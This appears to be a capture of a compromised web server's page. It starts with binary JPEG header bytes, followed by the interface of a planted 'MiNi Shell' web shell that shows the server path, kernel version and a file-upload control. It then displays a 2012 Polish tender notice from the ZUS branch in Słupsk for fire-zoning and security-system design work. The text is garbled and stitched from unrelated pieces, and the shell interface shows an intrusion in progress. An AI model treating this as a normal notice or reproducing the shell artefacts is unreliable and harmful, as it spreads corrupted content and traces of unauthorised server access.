JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120703/232810-N-2012.html

<p class="kh_header"><b>Słupsk: Wykonanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego na zadania p.n.:
1. Wydzielenie stref pożarowych w siedzibie O/ZUS w Słupsku, Pl. Zwycięstwa 8
2. Modernizacja SOK w siedzibie O/ZUS w Słupsku, Pl. Zwycięstwa 8 segment I i V</b><br>
<b>Numer ogłoszenia: 232810 - 2012; data zamieszczenia: 03.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Słupsku , Plac Zwycięstwa 8, 76-200 Słupsk, woj. pomorskie, tel. 59 8419406, 8419125, faks 59 8419406.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego na zadania p.n.:
1. Wydzielenie stref pożarowych w siedzibie O/ZUS w Słupsku, Pl. Zwycięstwa 8
2. Modernizacja SOK w siedzibie O/ZUS w Słupsku, Pl. Zwycięstwa 8 segment I i V.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego na zadania p.n.:
1. Wydzielenie stref pożarowych w siedzibie O/ZUS w Słupsku, Pl. Zwycięstwa 8
2. Modernizacja SOK w siedzibie O/ZUS w Słupsku, Pl. Zwycięstwa 8 segment I i V

Dane dotyczące obiektów Zamawiającego, dla których należy wykonać dokumentacje:
 
1) SEGMENT I

a) KUBATURA OBIEKTU			-	3.814,00m3
b) POWIERZCHNIA ZABUDOWY		-	  448,40m2
c) POWIERZCHNIA UŻYTKOWA		-	  387,90m2
d) ILOŚĆ KONDYGNACJI			-                       2
e) ROK BUDOWY				-	       1991r.
Obiekt administracyjno - biurowy, połączony funkcjonalnie z segmentem nr II i (za pomocą tzw. przełączki w poziomie piętra) z segmentem nr V. Obiekt niepodpiwniczony. Budynek zrealizowany w technologii tradycyjnej z częściową prefabrykacją. Ślusarka okienna i drzwiowa aluminiowa z wkładami zespolonymi.

2) SEGMENT II

a) KUBATURA OBIEKTU			-	8.065,00m3
b) POWIERZCHNIA ZABUDOWY		-	   435,60m2
c) POWIERZCHNIA UŻYTKOWA		-	1.213,80m2
d) ILOŚĆ KONDYGNACJI			-	5 (w tym poddasze z pokojami gościnnymi)
e) ROK BUDOWY				-	        1991r.
Obiekt administracyjno - biurowy, połączony funkcjonalnie z segmentem nr I i z segmentem nr III. Obiekt o pięciu kondygnacjach z poddaszem, w którego części wygospodarowano pokoje gościnne. W budynku, od poziomu pierwszej kondygnacji znajduje się atrium. Budynek wyposażony w dźwig osobowy (szyb dobudowany w atrium). Budynek zrealizowany w technologii tradycyjnej z częściową prefabrykacją. Ślusarka okienna i drzwiowa aluminiowa z wkładami zespolonymi.

3) SEGMENT III

a) KUBATURA OBIEKTU			-	9.206,00m3
b) POWIERZCHNIA ZABUDOWY		-	   492,30m2
c) POWIERZCHNIA UŻYTKOWA		-	   949,75m2
d) ILOŚĆ KONDYGNACJI			-	6 (w tym poddasze z pokojami gościnnymi)
e) ROK BUDOWY				-	        1991r.
Obiekt administracyjno - biurowy, połączony funkcjonalnie z segmentem nr II 
i w  poziomie przyziemia łącznikiem z segmentem nr IV. Obiekt o pięciu kondygnacjach z poddaszem, w którego części wygospodarowano pokoje gościnne (w roku 1995). Budynek całkowicie podpiwniczony. W budynku, od poziomu II kondygnacji znajduje się atrium. Budynek zrealizowany w technologii tradycyjnej z częściową prefabrykacją. Ślusarka okienna i drzwiowa aluminiowa z wkładami zespolonymi.

4) SEGMENT IV

a) KUBATURA OBIEKTU			-	3.484,00m3
b) POWIERZCHNIA ZABUDOWY		-	   497,20m2
c) POWIERZCHNIA UŻYTKOWA		-	   493,70m2
d) ILOŚĆ KONDYGNACJI			-		    2
e) ROK BUDOWY				-	         1993r.
Obiekt administracyjno - biurowy, połączony z segmentem nr III za pomocą łącznika w przyziemiu. Obiekt niepodpiwniczony. Budynek zrealizowany w technologii tradycyjnej z częściową prefabrykacją. Ślusarka okienna i drzwiowa aluminiowa z wkładami zespolonymi. Łącznik posiada ściany o konstrukcji takiej samej, jak ściany segmentu IV.

5) SEGMENT V 

a) KUBATURA OBIEKTU			-	8.441,00m3
b) POWIERZCHNIA ZABUDOWY		-	   643,80m2
c) POWIERZCHNIA UŻYTKOWA		-	1.468,36m2
d) ILOŚĆ KONDYGNACJI			-		    5
e) ROK BUDOWY				-	         1996r.
Obiekt administracyjno - biurowy, połączony z segmentem nr I za pomocą przełączki, czyli dwóch galerii przejściowych w poziomie piętra. Obiekt podpiwniczony. W ścianach północnej i południowej budynku nad parterem znajdują się po trzy nadwieszone wykusze. Część wejściowa zadaszona częściowo przełączkami, częściowo zadaszeniem z poliwęglanu. Budynek zrealizowany w technologii tradycyjnej z częściową prefabrykacją. Ślusarka okienna i drzwiowa aluminiowa z wkładami zespolonymi. Konstrukcję nośną przełączki stanowią ramy żelbetowe oddylatowane od  obu budynków.

6) SEGMENT VI 

a) KUBATURA OBIEKTU			-	1.187,30m3
b) POWIERZCHNIA ZABUDOWY		-	   159,80m2
c) POWIERZCHNIA UŻYTKOWA		-	   195,00m2
d) ILOŚĆ KONDYGNACJI			-		    2
e) ROK BUDOWY				-	         1970r.
Obiekt o przeznaczeniu magazynowo - warsztatowym, powstał w 1970r. Budynek przebudowany w 2004r. Obiekt o dwóch kondygnacjach nadziemnych, niepodpiwniczony. Budynek zrealizowany w technologii tradycyjnej. Okna na parterze PCV, okna na piętrze częściowo drewniane tzw. zespolone, częściowo stalowe - przewidziane do wymiany w ramach termomodernizacji. 

Zakres dokumentacji projektowej i kosztorysowej dla zadania  Wydzielenie stref pożarowych w siedzibie O/ZUS w Słupsku, Pl. Zwycięstwa 8,  obejmuje następujące opracowania :

1) Projekt budowlany,
2) Projekt wykonawczy,
3) BIOZ ( Informacja dotycząca bezpieczeństwa i ochrony zdrowia),
4) specyfikacje techniczne wykonania i odbioru robót,
5) kosztorysy inwestorskie,
6) przedmiary,
7) ZZK,
8) inne projekty wynikające z rozwiązań przyjętych w projekcie budowlanym  

Zakres dokumentacji projektowej i kosztorysowej dla: Modernizacja SOK w siedzibie O/ZUS w Słupsku, Pl. Zwycięstwa 8 segment I i V, obejmuje następujące opracowania:

1) Koncepcja programowo-przestrzenna,
2) Projekt budowlany,
3) Projekt wykonawczy,
4) BIOZ ( Informacja dotycząca bezpieczeństwa i ochrony zdrowia),
5) specyfikacje techniczne wykonania i odbioru robót,
6) kosztorysy inwestorskie,
7) przedmiary,
8) ZZK,
9) inne projekty wynikające z rozwiązań przyjętych w projekcie budowlanym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 1.500,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje ww. warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwie usługi o wartości nie mniejszej niż 50.000,00 PLN brutto każda (słownie: pięćdziesiąt tysięcy złotych) polegające na opracowaniu dokumentacji projektowych, na które składały się projekt budowlany i projekty wykonawcze dotyczące budowy lub modernizacji budynków użyteczności publicznej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje ww. warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże że dysponuje minimum czterema osobami wyznaczonymi do uczestnictwa w wykonywaniu zamówienia, spełniającymi następujące warunki:
a)  minimum jedna osoba posiadająca:
-  aktualne uprawnienia budowlane do projektowania w specjalności architektonicznej w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2010r. Nr 243, poz.1623, ze zm.) lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-  co najmniej 5 letnie doświadczenie zawodowe w ww. specjalności - liczone od dnia uzyskania uprawnień, 
-  doświadczenie w wykonaniu co najmniej 1 dokumentacji projektowej dotyczącej budowy lub modernizacji budynków użyteczności publicznej
 
b) minimum jedna osoba posiadająca:
-  aktualne uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. 
z 2010r. Nr 243, poz.1623, ze zm.) lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
-  co najmniej 5 letnie doświadczenie zawodowe w ww. specjalności - liczone 
od dnia uzyskania uprawnień, 
c) minimum jedna osoba posiadająca:
 - aktualne uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2010r. Nr 243, poz.1623, ze zm.) lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
-  co najmniej 5 letnie doświadczenie zawodowe w ww. specjalności - liczone od dnia uzyskania uprawnień, 
d) minimum jedna osoba posiadająca:
 - aktualne uprawnienia budowlane do projektowania w specjalności instalacyjnej 
w zakresie sieci, instalacji   i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2010r. Nr 243, poz.1623, ze zm.) lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
-  co najmniej 5 letnie doświadczenie zawodowe w ww. specjalności - liczone od dnia uzyskania uprawnień. 

W przypadku posiadania przez jedną osobę wymaganych uprawnień budowlanych w różnych specjalnościach Zamawiający dopuszcza ich łączenie.

UWAGA: Dopuszcza się kwalifikacje równoważne do wymaganych uprawnień budowlanych, uzyskane w innych państwach, na zasadach określonych w art. 12 a ustawy Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623, ze zm.) oraz ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63 poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na wartość co najmniej 70.000,00 PLN (słownie: siedemdziesiąt  tysięcy złotych 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia wskazujące uprawnienie do podpisania oferty - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik,
2) w przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu  lub reprezentowania w postępowaniu i zawarcia umowy, stosownie do art. 23 ust. 2 ustawy,
3) wykaz tych części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość wprowadzenia zmian w umowie:
1) zmiana terminu końcowego w przypadku:
a) decyzji inwestora zmieniającej termin zakończenia prac w związku z okolicznościami nie mającymi związku z prowadzonymi pracami, a wynikającym z prowadzonej przez inwestora działalności,
b) wydłużenia czasu uzyskania decyzji lub uzgodnień z przyczyn nie leżących po stronie Wykonawcy ani Zamawiającego, np. uzyskanie decyzji o uwarunkowaniach środowiskowych inwestycji, itp.
c) przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej wykorzystywane przez oferentów lub inne podmioty przed zawarciem umowy, a termin zakończenia usług robót określony został datą,
d) zmian zakresu projektowania wprowadzonych decyzjami administracyjnymi wydanymi lub uprawomocnionymi po dniu rozstrzygnięcia postępowania skutkującego podpisaniem umowy;
e) zmiany zakresu projektowania przez inwestora lub konieczności wykonania innych prac dodatkowych (zamiennych) może spowodować przesunięcie terminu zakończenia robót - pod warunkiem podpisania przez strony porozumienia w sprawie zmiany terminu;
2) zmiana projektanta w przypadkach dopuszczonych przez Prawo budowlane i na wniosek Wykonawcy, pod warunkiem, że osoba (osoby) wskazana do przejęcia obowiązków projektanta, będzie posiadała przygotowanie co najmniej równe osobie dotychczas pełniącej tę funkcję oraz będzie spełniała wymogi określone w specyfikacji istotnych warunków zamówienia;
3) zmiana osób występujących po stronie Zamawiającego w wyniku zmian organizacyjnych Zamawiającego;
4) zamiana lub wprowadzenie nowych podwykonawców pod warunkiem uzyskania zgody Zamawiającego, na zasadach określonych we wzorze umowy;
5) zmiana formy zabezpieczenia na wniosek Wykonawcy, zgodnie z Prawem zamówień publicznych, pod warunkiem zachowania ciągłości zabezpieczenia i bez zmniejszenia jego wartości.
2. Zamawiającemu przysługuje prawo do:
1)  dokonywania zmian w projekcie,
2) obniżenia  wynagrodzenia w przypadku nie pełnienia nadzoru autorskiego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Słupsku, 76-200 Słupsk, Plac Zwycięstwa 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2012 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych Oddział w Słupsku, Plac Zwycięstwa 8, 76-200 Słupsk; Sekretariat Dyrektora Oddziału, I piętro, segm. II, pokój nr 123.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia do dnia 30.11.2012r. z zachowaniem terminów pośrednich.

2. ZAMAWIAJĄCY NIE PRZEWIDUJE:
1) zawarcia umowy ramowej,
2) udzielenia zamówień uzupełniających
3) rozliczania w walutach obcych
4) udzielenia zaliczek na poczet wykonania zamówienia,
5) przeprowadzenia aukcji elektronicznej,
6) ustanowienia dynamicznego systemu zakupów

3. ZAMAWIAJĄCY NIE DOPUSZCZA:
1) możliwości złożenia oferty przewidującej odmienny niż określony przez niego 
sposób wykonania zamówienia tj. oferty wariantowej - w rozumieniu art. 2 pkt 7 ustawy - Prawo zamówień publicznych,
2) składania ofert częściowych

4. Wykonawca, którego oferta zostanie wybrana zobowiązany będzie przed podpisaniem umowy do:
1) wniesienia zabezpieczenia należytego wykonania umowy w wysokości 4% łącznej ceny  brutto podanej w ofercie,
2) przedłożenia kopii aktualnych dokumentów osób wskazanych w ofercie o posiadaniu uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie do celów projektowych

5. Otwarcie ofert nastąpi w dniu 11.07.2012 r. o godz. 10.30 w siedzibie Zamawiającego: Zakład Ubezpieczeń Społecznych Oddział w Słupsku, Plac Zwycięstwa 8, 76-200 Słupsk - mała sala konferencyjna segm. II, I piętro, pok. 125

6. W przypadku składania jednej oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby:
